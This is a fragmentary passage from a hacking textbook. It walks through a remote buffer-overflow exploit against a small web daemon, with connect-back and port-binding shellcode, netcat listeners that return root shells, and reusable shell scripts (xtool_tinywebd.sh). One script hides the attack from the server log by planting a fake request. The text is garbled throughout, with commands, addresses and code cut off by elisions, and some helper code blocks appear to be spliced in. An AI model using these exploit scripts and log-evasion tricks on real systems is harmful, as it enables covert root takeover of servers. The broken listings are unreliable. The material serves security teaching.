reader@hacking:~/booksrc

$ nasm connectback_shell
...
1
...
j
...
jfXCh
...
j
...
C
...
Iy
...
R
...
|

$ wc -c connectback_shell
$ echo $(( 544 - (4*16) - 78 ))
$ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$

Since the offset from the beginning of the buffer to the return address is
540 bytes, a total of 544 bytes must be written to overwrite the four-byte return
address
...
To ensure proper alignment, the sum
of the NOP sled and shellcode bytes must be divisible by four
...
These are
the bounds of the response buffer, and the memory afterward corresponds
to other values on the stack that might be written to before we change the
program’s control flow
...
Repeating the
return address 16 times will generate 64 bytes, which can be put at the end of
the 544-byte exploit buffer and keeps the shellcode safely within the bounds
of the buffer
...
The calculations above show that a 402-byte NOP sled will
properly align the 78-byte shellcode and place it safely within the bounds of
the buffer
...
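The sled arithmetic is simple enough to capture in two small functions. This is a sketch with invented names (nop_sled_length, is_aligned) that mirrors the shell calculation shown in the output above.

```c
#include <assert.h>

/* Bytes left for the NOP sled once the repeated 4-byte return address and
 * the shellcode are accounted for. Returns -1 if they do not fit. */
int nop_sled_length(int total_len, int ret_addr_copies, int shellcode_len)
{
    int remaining;

    assert(total_len >= 0 && ret_addr_copies >= 0 && shellcode_len >= 0);
    remaining = total_len - 4 * ret_addr_copies - shellcode_len;
    return remaining >= 0 ? remaining : -1;
}

/* The sled plus the shellcode must be a multiple of four so that the
 * repeated return addresses stay aligned. */
int is_aligned(int sled_len, int shellcode_len)
{
    return (sled_len + shellcode_len) % 4 == 0;
}
```

With a 544-byte buffer, 16 copies of the return address, and 78 bytes of shellcode, the sled comes out to 402 bytes, and 402 + 78 = 480 is divisible by four.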
Overwriting the return address with 0xbffff688 should return
execution right to the middle of the NOP sled, while avoiding bytes near the
beginning of the buffer, which might get mangled
...
In the output below, netcat is used to listen
for incoming connections on port 31337
...

Now, in another terminal, the calculated exploit values can be used to
exploit the tinyweb program remotely
...
"\r\n"') | nc -v 127
...
0
...
0
...
1] 80 (www) open

Back in the original terminal, the shellcode has connected back to
the netcat process listening on port 31337
...

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
168
...
72] from hacking
...
168
...
72] 34391
whoami
root

The network configuration for this example is slightly confusing
because the attack is directed at 127
...
0
...
168
...
72
...
168
...
72 is easier to use in shellcode than 127
...
0
...
Since the loopback
address contains two null bytes, the address must be built on the stack with
multiple instructions
...
The file loopback_shell
...
s that uses the loopback address of 127
...
0
...

The differences are shown in the following output
...
s loopback_shell
...
168
...
72
-->
push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127
...
0
...
By writing a two-byte WORD of null bytes
at ESP+1, the middle two bytes will be overwritten to form the correct IP
address
...
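The two-step construction can be followed byte by byte in C. This sketch models the four stack bytes as an array; the function name build_loopback_ip is hypothetical, and the zero WORD is written directly here rather than taken from a register as shellcode would do.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of the trick: the pushed DWORD 0x01BBBB7f sits on the stack as
 * 7f bb bb 01, then a zero WORD written at offset 1 clears the two
 * middle bytes without any null bytes appearing in the instructions. */
void build_loopback_ip(unsigned char stack[4])
{
    const uint32_t pushed = 0x01BBBB7fu;   /* operand of the push DWORD */

    assert(stack != NULL);
    /* The push stores the DWORD in little-endian order. */
    stack[0] = (unsigned char)(pushed & 0xff);
    stack[1] = (unsigned char)((pushed >> 8) & 0xff);
    stack[2] = (unsigned char)((pushed >> 16) & 0xff);
    stack[3] = (unsigned char)((pushed >> 24) & 0xff);
    /* The two-byte write at ESP+1 overwrites the BBBB placeholder. */
    stack[1] = 0x00;
    stack[2] = 0x00;
}
```

The resulting bytes are 7f 00 00 01, which is 127.0.0.1 in network byte order.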
These calculations are shown in the output below, and they result in
a 397-byte NOP sled
...

reader@hacking:~/booksrc $ nasm loopback_shell
...
1
...
j
...
jfXCh
...
T$
...
j
...
C
...
I
...
Rh|
00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin
...
S
...
|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\xf6\xff\xbf"x16
...
0
...
1 80
localhost [127
...
0
...

reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337
...
0
...
1] from localhost [127
...
0
...
The only reason these frogs have such
an amazingly powerful defense is that a certain species
of snake kept eating them and developing a resistance
...
One result of this co-evolution is that the frogs are safe against all
other predators
...
Their
exploit techniques have been around for years, so it’s only natural that
defensive countermeasures would develop
...

This cycle of innovation is actually quite beneficial
...
Worms replicate by
exploiting existing vulnerabilities in flawed software
...
As with chickenpox, it’s better to suffer a
minor outbreak early instead of years later when it can cause real damage
...
In this way, worms
and viruses can actually strengthen security in the long run
...
Defensive countermeasures
exist which try to nullify the effect of an attack, or prevent the attack from
happening
...
These defensive countermeasures can be separated into two
groups: those that try to detect the attack and those that try to protect the
vulnerability
...
The detection process could be anything from an administrator
reading logs to a program sniffing the network
...

As a system administrator, the exploits you know about aren’t nearly as
dangerous as the ones you don’t
...
Intrusions
that aren’t discovered for months can be cause for concern
...
If you know that, then you know what to look for
...
After an intrusion is detected, the hacker
can be expunged from the system, any filesystem damage can be undone by
restoring from backup, and the exploited vulnerability can be identified and
patched
...

For the attacker, this means detection can counteract everything he does
...
Stealth is one of the hacker’s most valuable assets
...
The combination of “God mode” and invisibility makes for a
dangerous hacker
...
To stay hidden, you simply need to
anticipate the detection methods that might be used
...

The co-evolutionary cycle between hiding and detecting is fueled by thinking
of the things the other side hasn’t thought of
...
A remote target will be a server
program that accepts incoming connections
...
A daemon is a program that runs in the background and detaches from the controlling terminal in a certain way
...
It refers to a
molecule-sorting demon from an 1867 thought experiment by a physicist
named James Maxwell
...
Similarly, in Linux,
system daemons tirelessly perform tasks such as providing SSH service and
keeping system logs
...

With a few additions, the tinyweb
...
This new code uses a call to the daemon() function, which will spawn a new background process
...

DAEMON(3)

Linux Programmer's Manual

DAEMON(3)

NAME
daemon - run in the background
SYNOPSIS
#include ...

Unless the argument nochdir is non-zero, daemon() changes
working directory to the root ("/")
...

RETURN VALUE
(This function forks, and if the fork() succeeds, the parent does
_exit(0), so that further errors are seen by the child only
...
If an error occurs, daemon() returns -1
and sets the global variable errno to any of the errors specified for
the library functions fork(2) and setsid(2)
...
Without a controlling terminal,
system daemons are typically controlled with signals
...

0x621 Crash Course in Signals
Signals provide a method of interprocess communication in Unix
...
Signals are identified by a number, and each
one has a default signal handler
...
This allows the program to be interrupted, even if it is stuck in an infinite loop
...

In the example code below, several signal handlers are registered for certain
signals, whereas the main code contains an infinite loop
...
c
#include ...
h>
#include ...
h
* #define SIGHUP     1  Hangup
* #define SIGINT     2  Interrupt (Ctrl-C)
* #define SIGQUIT    3  Quit (Ctrl-\)
* #define SIGILL     4  Illegal instruction
* #define SIGTRAP    5  Trace/breakpoint trap
* #define SIGABRT    6  Process aborted
* #define SIGBUS     7  Bus error
* #define SIGFPE     8  Floating point error
* #define SIGKILL    9  Kill
* #define SIGUSR1   10  User defined signal 1
* #define SIGSEGV   11  Segmentation fault
* #define SIGUSR2   12  User defined signal 2
* #define SIGPIPE   13  Write to pipe with no one reading
* #define SIGALRM   14  Countdown alarm set by alarm()
* #define SIGTERM   15  Termination (sent by kill command)
* #define SIGCHLD   17  Child process signal
* #define SIGCONT   18  Continue if stopped
* #define SIGSTOP   19  Stop (pause execution)
* #define SIGTSTP   20  Terminal stop [suspend] (Ctrl-Z)
* #define SIGTTIN   21  Background process trying to read stdin
* #define SIGTTOU   22  Background process trying to write to stdout
*/
/* A signal handler */
void signal_handler(int signal) {
   printf("Caught signal %d\t", signal);
   if (signal == SIGTSTP)
      printf("SIGTSTP (Ctrl-Z)");
   else if (signal == SIGQUIT)
      printf("SIGQUIT (Ctrl-\\)");
   else if (signal == SIGUSR1)
      printf("SIGUSR1");
   else if (signal == SIGUSR2)
      printf("SIGUSR2");
   printf("\n");
}
void sigint_handler(int x) {
printf("Caught a Ctrl-C (SIGINT) in a separate handler\nExiting
...

signal(SIGUSR2, signal_handler);
signal(SIGINT, sigint_handler);
while(1) {}

// Set sigint_handler() for SIGINT
...

}

When this program is compiled and executed, signal handlers are
registered, and the program enters an infinite loop
...
In the output below, signals that can be triggered
from the controlling terminal are used
...

reader@hacking:~/booksrc $ gcc -o signal_example signal_example
...
/signal_example
Caught signal 20        SIGTSTP (Ctrl-Z)
Caught signal 3 SIGQUIT (Ctrl-\)
Caught a Ctrl-C (SIGINT) in a separate handler
Exiting
...
By
default, the kill command sends the terminate signal (SIGTERM) to a process
...
In the
output below, the SIGUSR1 and SIGUSR2 signals are sent to the signal_example
program being executed in another terminal
...
/signal_example
24512 pts/1    S+     0:00 grep signal_example
reader@hacking:~/booksrc $ kill -10 24491
reader@hacking:~/booksrc $ kill -12 24491
reader@hacking:~/booksrc $ kill -9 24491
reader@hacking:~/booksrc $

Finally, the SIGKILL signal is sent using kill -9
...
In the
other terminal, the running signal_example shows the signals as they are
caught and the process is killed
...
/signal_example
Caught signal 10        SIGUSR1
Caught signal 12        SIGUSR2
Killed
reader@hacking:~/booksrc $

Signals themselves are pretty simple; however, interprocess communication can quickly become a complex web of dependencies
...
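For comparison, here is a minimal sketch of the same idea using sigaction() rather than the signal() call used in the example above. The helper names watch_signal and last_caught_signal are invented for this sketch. The handler only records the signal number, since printf() is not guaranteed to be safe inside a signal handler.

```c
#define _POSIX_C_SOURCE 200809L   /* expose sigaction() under strict -std modes */
#include <signal.h>
#include <string.h>

/* Written from the handler; sig_atomic_t is the integer type that can be
 * safely assigned from a signal handler. */
static volatile sig_atomic_t last_signal = 0;

static void note_signal(int signum)
{
    last_signal = signum;   /* record only; no I/O inside the handler */
}

/* Registers note_signal() for signum.
 * Returns 0 on success, -1 on error (for example, for SIGKILL). */
int watch_signal(int signum)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = note_signal;
    sigemptyset(&sa.sa_mask);
    return sigaction(signum, &sa, NULL);
}

/* Returns the number of the most recently caught signal, or 0 if none. */
int last_caught_signal(void)
{
    return (int)last_signal;
}
```

After watch_signal(SIGUSR1), sending the process signal 10 with kill (or calling raise(SIGUSR1)) makes last_caught_signal() return SIGUSR1. SIGKILL cannot be caught, so registering a handler for it fails.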

0x622 Tinyweb Daemon
This newer version of the tinyweb program is a system daemon that runs in
the background without a controlling terminal
...

These additions are fairly minor, but they provide a much more realistic
exploit target
...

tinywebd
...
h>
...
h>
...
h>
...
h>
...
h>
"hacking
...
h"

#define PORT 80 // The port users will be connecting to
#define WEBROOT "
...
log" // Log filename
int logfd, sockfd; // Global log and socket file descriptors
void handle_connection(int, struct sockaddr_in *, int);
int get_file_size(int); // Returns the file size of open file descriptor
void timestamp(int); // Writes a timestamp to the open file descriptor
// This function is called when the process is killed
...
\n", 16);
close(logfd);
close(sockfd);
exit(0);
}
int main(void) {
int new_sockfd, yes=1;
struct sockaddr_in host_addr, client_addr;
socklen_t sin_size;

// My address information

logfd = open(LOGFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(logfd == -1)
fatal("opening log file");
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
fatal("setting socket option SO_REUSEADDR");
printf("Starting tiny web daemon
...

fatal("forking to daemon process");
signal(SIGTERM, handle_shutdown);
signal(SIGINT, handle_shutdown);

// Call handle_shutdown when killed
...

timestamp(logfd);
write(logfd, "Starting up
...
sin_family = AF_INET;
//
host_addr
...
sin_addr
...
sin_zero), '\0', 8);

Host byte order
Short, network byte order
// Automatically fill with my IP
...

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
fatal("binding to socket");
if (listen(sockfd, 20) == -1)
fatal("listening on socket");
while(1) { // Accept loop
...
The connection is
* processed as a web request and this function replies over the connected
* socket
...

*/
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
unsigned char *ptr, request[500], resource[500], log_buffer[500];
int fd, length;
length = recv_line(sockfd, request);
sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
ptr = strstr(request, " HTTP/"); // Search for valid-looking request
...

ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...

if(strncmp(request, "HEAD ", 5) == 0) // Head request
ptr = request+5; // ptr is the URL
...
html");
// add 'index
...

strcpy(resource, WEBROOT); // Begin resource with web root path
strcat(resource, ptr); // and join it with resource path
...

if(fd == -1) { // If file is not found
strcat(log_buffer, " 404 Not Found\n");
send_string(sockfd, "HTTP/1
...

strcat(log_buffer, " 200 OK\n");
send_string(sockfd, "HTTP/1
...

send(sockfd, ptr, length, 0); // Send it to socket
...

}
close(fd); // Close the file
...

} // End if block for valid request
...

timestamp(logfd);
length = strlen(log_buffer);
write(logfd, log_buffer, length); // Write to the log
...

}
/* This function accepts an open file descriptor and returns
* the size of the associated file
...

*/
int get_file_size(int fd) {
struct stat stat_struct;
if(fstat(fd, &stat_struct) == -1)
return -1;
return (int) stat_struct
...

*/
void timestamp(int fd) {
time_t now;
struct tm *time_struct;
int length;
char time_buffer[40];
time(&now); // Get number of seconds since epoch
...

length = strftime(time_buffer, 40, "%m/%d/%Y %H:%M:%S> ", time_struct);
write(fd, time_buffer, length); // Write timestamp string to log
...
The log file descriptor and
connection-receiving socket are declared as globals so they can be closed
cleanly by the handle_shutdown() function
...
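The timestamp format used in the listing can be tried on its own. The helper below is a hypothetical wrapper (the name format_log_stamp is not from tinywebd) that applies the same strftime() pattern to a caller-supplied time.

```c
#include <stddef.h>
#include <time.h>

/* Formats tm_in with the pattern used by timestamp() in the listing,
 * "%m/%d/%Y %H:%M:%S> ". Returns the number of bytes written to out
 * (not counting the terminating null), or 0 if out_len is too small. */
size_t format_log_stamp(const struct tm *tm_in, char *out, size_t out_len)
{
    return strftime(out, out_len, "%m/%d/%Y %H:%M:%S> ", tm_in);
}
```

The prefix is always 21 bytes long, so the 40-byte time_buffer in the listing leaves plenty of room.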

The output below shows the program compiled, executed, and killed
...

reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
Starting tiny web daemon
...
c
sudo chown root
...
/tinywebd

...
/webserver_id 127
...
0
...
0
...
1 is Tiny webserver
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25058 ?        Ss     0:00
...
log
cat: /var/log/tinywebd
...
log
07/22/2007 17:55:45> Starting up
...
0
...
1:38127 "HEAD / HTTP/1
...

reader@hacking:~/booksrc $

200 OK

This tinywebd program serves HTTP content just like the original tinyweb
program, but it behaves as a system daemon, detaching from the controlling
terminal and writing to a log file
...
Using the
new tinyweb daemon as a more realistic exploit target, you will learn how to
avoid detection after the intrusion
...
For this kind of attack, exploit scripts are an essential tool of the
trade
...
Through careful manipulation of the internal
mechanisms, the security can be entirely sidestepped
...
The fine line between
an exploit program and an exploit tool is a matter of finalization and reconfigurability
...
Like a gun, an
exploit program has a singular utility and the user interface is as simple as
pulling a trigger
...
In contrast, exploit
tools usually aren’t finished products, nor are they meant for others to use
...
These personalized
tools automate tedious tasks and facilitate experimentation
...

0x631 tinywebd Exploit Tool
For the tinyweb daemon, we want an exploit tool that allows us to experiment
with the vulnerabilities
...

The offset to the return address will be the same as in the original tinyweb
...
The daemon
call forks the process, running the rest of the program in the child process,
while the parent process exits
...

reader@hacking:~/booksrc $ gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
\n");
47
if(daemon(1, 1) == -1) // Fork to a background daemon process
...

51
signal(SIGINT, handle_shutdown);
// Call handle_shutdown when interrupted
...
c, line 50
...
out
Starting tiny web daemon
...

(gdb)

When the program is run, it just exits
...
This is done by setting follow-fork-mode to child
...

(gdb) set follow-fork-mode child
(gdb) help set follow-fork-mode
Set debugger response to a program call of fork or vfork
...
follow-fork-mode can be:
parent - the original process is debugged after a fork
child  - the new process is debugged after a fork
The unfollowed process will continue to run
...

(gdb) run
Starting program: /home/reader/booksrc/a
...

[Switching to process 1051]
Breakpoint 1, main () at tinywebd
...
Exit anyway? (y or n)
reader@hacking:~/booksrc $ ps aux | grep a
...
0 0
...
0 0
...

y
Ss
R+

06:04
06:13

0:00 /home/reader/booksrc/a
...
out

It’s good to know how to debug child processes, but since we need
specific stack values, it’s much cleaner and easier to attach to a running
process
...
out processes, the tinyweb daemon is
started back up and then attached to with GDB
...

reader@hacking:~/booksrc $
root
25830 0
...
0
reader 25837 0
...
0
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $

...
/tinywebd
2880
748 pts/1
R+
20:10 0:00 grep tinywebd
gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

A program is being debugged already
...

(gdb) bt
#0 0xb7fe77f2 in ?? ()
#1 0xb7f691e1 in ?? ()
#2 0x08048f87 in main () at tinywebd
...
The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket
...

81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd
...

(gdb) cont
Continuing
...

Once again, a connection is made to the webserver using a browser to advance
the code execution to the breakpoint
...
c:86
86
length = recv_line(sockfd, request);
(gdb) bt
#0 handle_connection (sockfd=5, client_addr_ptr=0xbffff810, logfd=3) at tinywebd
...
c:72
(gdb) x/x request
0xbffff5c0:     0x080484ec
(gdb) x/16x request + 500
0xbffff7b4:     0xb7fd5ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff7c4:     0xb7ff9300      0xb7fd5ff4      0xbffff7e0      0xb7f691c0
0xbffff7d4:     0xb7fd5ff4      0xbffff848      0x08048fb7      0x00000005
0xbffff7e4:     0xbffff810      0x00000003      0xbffff838      0x00000004
(gdb) x/x 0xbffff7d4 + 8
0xbffff7dc:     0x08048fb7
(gdb) p /x 0xbffff7dc - 0xbffff5c0
$1 = 0x21c
(gdb) p 0xbffff7dc - 0xbffff5c0
$2 = 540
(gdb) p /x 0xbffff5c0 + 100
$3 = 0xbffff624
(gdb) quit
The program is running
...
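The address arithmetic from the debugging session above can be double-checked in C. This is a sketch with invented function names. The input values are the ones GDB printed, and the little-endian encoding assumes a 32-bit x86 target.

```c
#include <stdint.h>

/* Distance in bytes from the start of a buffer to the saved return
 * address, both given as 32-bit stack addresses read from the debugger. */
uint32_t offset_to_ret(uint32_t buffer_addr, uint32_t saved_ret_addr)
{
    return saved_ret_addr - buffer_addr;
}

/* Stores a 32-bit address in little-endian byte order, the order in
 * which it must appear in memory on x86. */
void addr_to_le_bytes(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

offset_to_ret(0xbffff5c0, 0xbffff7dc) gives 540, and encoding 0xbffff5c0 + 100 yields the bytes 24 f6 ff bf.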

The safest place for the shellcode is near the middle of the 500-byte request
buffer
...
The
128 bytes of repeated return address keep the shellcode out of unsafe stack
memory, which might be overwritten
...
To keep the shellcode out of this range, a 100-byte NOP sled is put in
front of it
...
The following output exploits the vulnerability using
the loopback shellcode
...
/tinywebd
Starting tiny web daemon
...
"\r\n"') | nc -w 1 -v 127
...
0
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

Since the offset to the return address is 540 bytes, 544 bytes are needed
to overwrite the address
...
netcat is run in listen mode with an ampersand (&) appended to
the end, which sends the process to the background
...
On the LiveCD, the at (@) symbol in the command prompt
will change color if there are background jobs, which can also be listed with
the jobs command
...
Afterward, the backgrounded
netcat process that received the connectback shell can be resumed
...
All these repetitive steps can be put into a
single shell script
...
The if statement at
the beginning of this script is just for error checking and displaying the usage
message
...
The shellcode used for
the exploit is passed as a command-line argument, which makes this a useful
tool for trying out a variety of shellcodes
...
sh
#!/bin/sh
# A tool for exploiting tinywebd
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 <shellcode file> <target IP>"
exit
fi
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))
echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr ($((4*32)) bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32
...
This puts an
extra copy of the return address past where the offset dictates
...
The output below shows this tool being
used to exploit the tinyweb daemon once again, but with the port-binding
shellcode
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd
...
0
...
1
target IP: 127
...
0
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ nc -vv 127
...
0
...
0
...
1] 31337 (?) open
whoami
root

Now that the attacking side is armed with an exploit script, consider what
happens when it’s used
...
The log file kept
by the tinyweb daemon is one of the first places to look when troubleshooting a problem
...

tinywebd Log File
reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd
...

07/25/2007 14:57:00> From 127
...
0
...
0"
200 OK
07/25/2007 17:49:14> From 127
...
0
...
1"
200 OK
07/25/2007 17:49:14> From 127
...
0
...
jpg HTTP/1
...
0
...
1:50203 "GET /favicon
...
1"
07/25/2007 17:57:21> Shutting down
...

08/01/2007 15:43:41> From 127
...
0
...
On secure networks, however, copies
of logs are often sent to another secure server
...
These types of countermeasures prevent tampering with the logs after successful exploitation
...
Log files usually contain many valid entries, whereas
exploit attempts stick out like a sore thumb
...

Look at the source code and see if you can figure out how to do this before
continuing on
...
0
...
1:38127
127
...
0
...
0
...
1:50202
127
...
0
...
0"
200 OK
"GET / HTTP/1
...
jpg HTTP/1
...
ico HTTP/1
...
But how exactly do you hide
a big, ugly exploit buffer in the proverbial sheep’s clothing?

There’s a simple mistake in the tinyweb daemon’s source code that allows
the request buffer to be truncated early when it’s used for the log file output,
but not when copying into memory
...
These string functions are used to write to the log file, so by
strategically using both delimiters, the data written to the log can be partially
controlled
...
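The mismatch between the two delimiters can be shown in isolation. The sketch below is not taken from tinywebd. It assumes, as in the earlier tinyweb listing, that the line reader stops at "\r\n" while the logging code uses a "%s" conversion that stops at the first null byte. Both function names are hypothetical.

```c
#include <stdio.h>

/* Copies request into log_out the way a "%s" conversion would: it stops
 * at the first null byte, no matter how many bytes were received.
 * Returns the number of characters that reached the log. */
size_t log_visible_part(const unsigned char *request, char *log_out,
                        size_t log_len)
{
    if (log_len == 0)
        return 0;

    int n = snprintf(log_out, log_len, "%s", (const char *)request);

    if (n < 0)
        return 0;
    return ((size_t)n < log_len) ? (size_t)n : log_len - 1;
}

/* Length of a received line as a "\r\n"-terminated reader sees it: null
 * bytes are ordinary data, and only the CR LF pair ends the line.
 * Returns recv_len if no terminator is present. */
size_t line_length_crlf(const unsigned char *data, size_t recv_len)
{
    for (size_t i = 0; i + 1 < recv_len; i++)
        if (data[i] == '\r' && data[i + 1] == '\n')
            return i;
    return recv_len;
}
```

For an illustrative request consisting of a short valid-looking line, a null byte, more data, and then "\r\n", the log sees only the part before the null, while the line reader counts everything up to the "\r\n".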
The NOP sled is shrunk to accommodate the new data
...
sh
#!/bin/sh
# stealth exploitation tool
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 <shellcode file> <target IP>"
exit
fi
FAKEREQUEST="GET / HTTP/1
...
\"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32
...
A null byte won’t stop the recv_line() function, so the
rest of the exploit buffer is copied to the stack
...
The following output shows this
exploit script in use
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (318 b)] [shellcode (83 b)] [ret addr (128 b)]
localhost [127
...
0
...

08/02/2007 13:37:36> Starting up
...
0
...
1:32828 "GET / HTTP/1
...

0x650 Overlooking the Obvious
In a real-world scenario, the other obvious sign of intrusion is even more
apparent than log files
...
If log files seem like the most obvious sign of intrusion to you,
then you are forgetting about the loss of service
...
In a real-world scenario, this exploit would
be detected almost immediately when someone tries to access the website
...
The program
continues to process requests and it seems like nothing happened
...
Since it can take hours just to track down
where the error occurred, it’s usually better to break a complex exploit down
into smaller parts
...
The shell is interactive, which causes
some complications, so let’s deal with that later
...
Let’s begin by writing a piece of shellcode that does something to prove
it ran and then puts the tinyweb daemon back together so it can process further web requests
...
One simple way to prove
the shellcode ran is to create a file
...
Of course, the open() call will need the appropriate flags to
create a file
...
If you recall, we’ve done
something like this already—the notetaker program makes a call to open()
which will create a file if it didn’t exist
...
In the output below, this is
used to verify that the arguments to open() in C match up with the raw system calls
...
/notetaker test
execve("
...
/notetaker", "test"], [/* 27 vars */]) = 0
brk(0)
= 0x804a000
access("/etc/ld
...
nohwcap", F_OK)
= -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe5000
access("/etc/ld
...
preload", R_OK)
= -1 ENOENT (No such file or directory)
open("/etc/ld
...
cache", O_RDONLY)
= 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=70799,
...
so
...
so
...
, 512) = 512
fstat64(3, {st_mode=S_IFREG|0644, st_size=1307104,
...
}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe4000
write(1, "[DEBUG] buffer
@ 0x804a008: \'t"
...
, 43[DEBUG] datafile @ 0x804a070: '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_APPEND|O_CREAT, 0600) = -1 EACCES (Permission denied)
dup(2)
= 3
fcntl64(3, F_GETFL)
= 0x2 (flags O_RDWR)
fstat64(3, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...
, 65[!!] Fatal Error in main() while opening file:
Permission denied
) = 65
close(3)
= 0
munmap(0xb7fe3000, 4096)
= 0
exit_group(-1)
= ?
Process 21473 detached
reader@hacking:~/booksrc $ grep open notetaker
...
That doesn’t matter, though;
we just want to make sure the arguments to the open() system call match the
arguments to the open() call in C
...
The compiler has already done all the work
of looking up the defines and mashing them together with a bitwise OR operation; we just need to find the call arguments in the disassembly of the notetaker binary
...
/notetaker
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
In this case, the compiler decided to use mov DWORD PTR
[esp+offset], value_to_push_to_stack instead of push instructions, but the
structure built on the stack is equivalent
...
This means that O_WRONLY|
O_CREAT|O_APPEND turns out to be 0x441 and S_IRUSR|S_IWUSR is 0x180
...
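These two constants can also be confirmed directly from the headers instead of the disassembly. The sketch below simply ORs the defines together. The function names are invented, and the 0x441 value is an assumption that holds for Linux on x86, since the flag values differ on some other systems.

```c
#include <fcntl.h>
#include <sys/stat.h>

/* Flags passed to open() by the notetaker program. */
int notetaker_open_flags(void)
{
    return O_WRONLY | O_CREAT | O_APPEND;
}

/* Permission bits: read and write for the file's owner only. */
unsigned int notetaker_open_mode(void)
{
    return S_IRUSR | S_IWUSR;
}
```

On the Linux system used in the text, printing these with "%#x" shows 0x441 and 0x180, matching the values found in the disassembly.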

mark
...

jmp short one
two:
pop ebx              ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5        ; Open()
pop eax
mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
int 0x80             ; Open file to create it
...

xor eax, eax
mov ebx, eax
inc eax              ; Exit call
...

one:
call two
db "/HackedX"
;   01234567

The shellcode opens a file to create it and then immediately closes the
file
...
The output below shows this
new shellcode being used with the exploit tool
...
/tinywebd
Starting tiny web daemon
...
s
reader@hacking:~/booksrc $ hexdump -C mark
00000000 eb 23 5b 31 c9 88 4b 07 6a 05 58 66 b9 41 04 31 |
...
K
...
Xf
...
1|
00000010 d2 66 ba 80 01 cd 80 89 c3 6a 06 58 cd 80 31 c0 |
...
j
...
1
...
/Hacke|
00000030 64 58
|dX|
00000032
reader@hacking:~/booksrc $ ls -l /Hacked
ls: /Hacked: No such file or directory
reader@hacking:~/booksrc $
...
sh mark 127
...
0
...
0
...
1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-17 16:59 /Hacked
reader@hacking:~/booksrc $

0x652 Putting Things Back Together Again
To put things back together again, we just need to repair any collateral damage
caused by the overwrite and/or shellcode, and then jump execution back
into the connection accepting loop in main()
...

reader@hacking:~/booksrc $ gcc -g tinywebd
...
/a
...
so
...

(gdb) disass main
Dump of assembler code for function main:
0x08048d93 <main+0>:    push   ebp
0x08048d94 <main+1>:    mov    ebp,esp
0x08048d96 <main+3>:    sub    esp,0x68
0x08048d99 <main+6>:    and    esp,0xfffffff0
0x08048d9c <main+9>:    mov    eax,0x0
0x08048da1 <main+14>:   sub    esp,eax

...

